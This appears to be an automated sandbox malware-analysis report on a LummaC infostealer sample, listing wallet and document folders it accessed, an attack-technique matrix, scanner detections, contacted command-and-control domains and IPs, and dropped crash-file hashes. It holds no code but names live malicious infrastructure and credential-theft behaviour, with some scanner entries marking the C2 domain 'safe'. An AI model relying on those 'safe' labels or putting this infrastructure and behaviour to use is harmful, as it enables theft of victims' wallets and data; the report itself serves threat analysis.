            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7728, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7728, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            311
            Process Injection
            1
            Masquerading
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            13
            Virtualization/Sandbox Evasion
            LSASS Memory151
            Security Software Discovery
            Remote Desktop Protocol31
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Disable or Modify Tools
            Security Account Manager13
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares2
            Clipboard Data
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
            Process Injection
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
            Obfuscated Files or Information
            Cached Domain Credentials33
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            b.exe26%ReversingLabsWin32.Infostealer.Generic
            b.exe30%VirustotalBrowse
            b.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
            No Antivirus matches
            SourceDetectionScannerLabelLink
            frogs-severz.sbs4%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://frogs-severz.sbs/api80%Avira URL Cloudsafe
            https://revirepart.biz/100%Avira URL Cloudmalware
            https://frogs-severz.sbs/api0%Avira URL Cloudsafe
            https://frogs-severz.sbs/J0%Avira URL Cloudsafe
            https://revirepart.biz/20%VirustotalBrowse
            https://frogs-severz.sbs/api;0%Avira URL Cloudsafe
            https://frogs-severz.sbs:443/api0%Avira URL Cloudsafe
            https://frogs-severz.sbs/.0%Avira URL Cloudsafe
            https://revirepart.biz/api100%Avira URL Cloudmalware
            https://frogs-severz.sbs/0%Avira URL Cloudsafe
            https://frogs-severz.sbs/apibu0%Avira URL Cloudsafe
            https://frogs-severz.sbs/pp0%Avira URL Cloudsafe
            https://frogs-severz.sbs:443/apicuriz0%Avira URL Cloudsafe
            https://frogs-severz.sbs/api$0%Avira URL Cloudsafe
            https://frogs-severz.sbs/apie0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            frogs-severz.sbs
            104.21.88.250
            truetrueunknown
            revirepart.biz
            104.21.43.198
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://frogs-severz.sbs/apitrue
              • Avira URL Cloud: safe
              unknown
              https://revirepart.biz/apitrue
              • Avira URL Cloud: malware
              unknown
              revirepart.bizfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://frogs-severz.sbs/Jaspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://revirepart.biz/aspnet_regiis.exe, 00000002.00000003.1726420977.00000000028E6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 20%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://frogs-severz.sbs/api;aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://upx.sf.netAmcache.hve.5.drfalse
                            high
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://frogs-severz.sbs/api8aspnet_regiis.exe, 00000002.00000002.1925302467.000000000294F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016aspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E42000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804527241.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17aspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E42000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804527241.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://frogs-severz.sbs:443/apiaspnet_regiis.exe, 00000002.00000003.1924361265.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://frogs-severz.sbs/aspnet_regiis.exe, 00000002.00000002.1925207846.0000000002927000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804693049.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804839414.0000000004DA7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1770809655.0000000002937000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1904340370.0000000002927000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804566888.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://frogs-severz.sbs/apibuaspnet_regiis.exe, 00000002.00000002.1925302467.000000000294F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://x1.c.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://x1.i.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installaspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.microsofaspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://frogs-severz.sbs/.aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850397648.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850064966.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://frogs-severz.sbs/ppaspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826659361.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850397648.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1827760791.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850064966.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://frogs-severz.sbs:443/apicurizaspnet_regiis.exe, 00000002.00000003.1924361265.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesaspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://frogs-severz.sbs/api$aspnet_regiis.exe, 00000002.00000003.1876536133.000000000294F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://frogs-severz.sbs/apieaspnet_regiis.exe, 00000002.00000003.1826478661.0000000002947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826429538.0000000002943000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.21.43.198
                                                            revirepart.bizUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.21.88.250
                                                            frogs-severz.sbsUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1561391
                                                            Start date and time:2024-11-23 10:24:05 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 38s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:10
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:b.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@5/7@2/2
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 90%
                                                            • Number of executed functions: 24
                                                            • Number of non-executed functions: 46
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            TimeTypeDescription
                                                            04:25:01API Interceptor8x Sleep call for process: aspnet_regiis.exe modified
                                                            04:25:22API Interceptor1x Sleep call for process: WerFault.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.21.43.198injector V2.5.exeGet hashmaliciousLummaCBrowse
                                                              gdi32.dllGet hashmaliciousLummaCBrowse
                                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  revirepart.bizinjector V2.5.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.43.198
                                                                  hmjsOnyfSB.dllGet hashmaliciousLummaCBrowse
                                                                  • 172.67.184.174
                                                                  modest-menu.exeGet hashmaliciousLummaCBrowse
                                                                  • 172.67.184.174
                                                                  gdi32.dllGet hashmaliciousLummaCBrowse
                                                                  • 104.21.43.198
                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.43.198
                                                                  c2_Acid.exeGet hashmaliciousLummaCBrowse
                                                                  • 172.67.184.174
                                                                  XRuncher_2.5.0.6.exeGet hashmaliciousLummaCBrowse
                                                                  • 172.67.184.174
                                                                  Jorieh.exeGet hashmaliciousLummaCBrowse
                                                                  • 172.67.184.174
                                                                  frogs-severz.sbsfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 193.143.1.19
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CLOUDFLARENETUSLoader.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.162.84
                                                                  loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.44.93
                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                  • 162.159.61.3
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.33.116
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.162.84
                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                  • 172.64.41.3
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.67.162.84
                                                                  17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                  • 104.20.3.235
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.162.84
                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                  • 172.64.41.3
                                                                  CLOUDFLARENETUSLoader.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.162.84
                                                                  loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.44.93
                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                  • 162.159.61.3
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.33.116
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.162.84
                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                  • 172.64.41.3
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.67.162.84
                                                                  17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                  • 104.20.3.235
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 172.67.162.84
                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                  • 172.64.41.3
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  a0e9f5d64349fb13191bc781f81f42e1Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.43.198
                                                                  • 104.21.88.250
                                                                  loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.43.198
                                                                  • 104.21.88.250
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.43.198
                                                                  • 104.21.88.250
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.43.198
                                                                  • 104.21.88.250
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • 104.21.43.198
                                                                  • 104.21.88.250
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.43.198
                                                                  • 104.21.88.250
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • 104.21.43.198
                                                                  • 104.21.88.250
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.43.198
                                                                  • 104.21.88.250
                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                  • 104.21.43.198
                                                                  • 104.21.88.250
                                                                  Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.43.198
                                                                  • 104.21.88.250
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.9779097537291204
                                                                  Encrypted:false
                                                                  SSDEEP:96:tmFNMUsOsHKw5MldvxmoijCQXIDcQvc6QcEVcw3cE/H+BHUHZ0ownOgHkEwH3dEX:InMUsOsYkd0BU/qaGpezuiF1Z24IO8r
                                                                  MD5:4D8F918F1FDFFFAE24544295023B845D
                                                                  SHA1:3D87493091C12BA3704BD264D92CDE359EB54BF9
                                                                  SHA-256:9057E5BD12CAD2E09B10022521CC3C1A7948E0FD65D55245832AB27700A96711
                                                                  SHA-512:49A018E44823EB62AD23453418B303AF19431D5D2F562E7AEFC83CA2D33DE2DD4FDAFF60BEB9A71C2597272E1F27E317840F477A8496777EABB713EE0C29AFC4
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.2.7.4.9.9.1.8.2.6.6.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.2.7.5.0.0.1.5.1.4.0.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.2.1.b.3.c.3.-.b.7.a.5.-.4.6.0.d.-.9.3.d.e.-.9.e.5.b.8.9.f.e.3.3.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.7.f.2.e.b.d.-.7.1.f.5.-.4.0.d.d.-.b.e.4.d.-.3.6.c.c.9.8.e.1.5.d.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.u.b.y.L.i.a.m.V.i.o.l.e.t...z.Y.O.f.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.e.0.-.0.0.0.1.-.0.0.1.4.-.a.c.6.9.-.6.c.9.0.8.9.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.c.a.e.a.a.9.d.7.5.a.f.4.5.5.5.e.c.c.6.3.6.7.d.d.3.2.c.d.5.4.1.1.2.3.c.5.e.5.
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 15 streams, Sat Nov 23 09:24:59 2024, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):189946
                                                                  Entropy (8bit):3.4636367944781457
                                                                  Encrypted:false
                                                                  SSDEEP:1536:VkoqjkrpN4uE2aOvELTgNXFVs2DP/SJlCD4XYWJ0pbjPJPq+9:Vko/D4uEqsLTgCm2w4R0pbtC+
                                                                  MD5:138884DBE9668CAAD1292825F17479B5
                                                                  SHA1:EF351530E1771F876AB19D99E21188499F17095D
                                                                  SHA-256:71D4BC78D7AF2BB946337967788CF11D0463FED1F9CEC8888ADA9CE034ED59E5
                                                                  SHA-512:EF6BB2839447FBBA443D7DF20385B3D520D2042CC15FA0780BC949EB54B90B28E84207D26CDC000B22995D26457AD5027CED30AD8339D8D1D34A2C1AE17A9A22
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:MDMP..a..... .......k.Ag............D...............X.......$................J..........`.......8...........T...........00.............,............ ..............................................................................eJ....... ......GenuineIntel............T...........j.Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
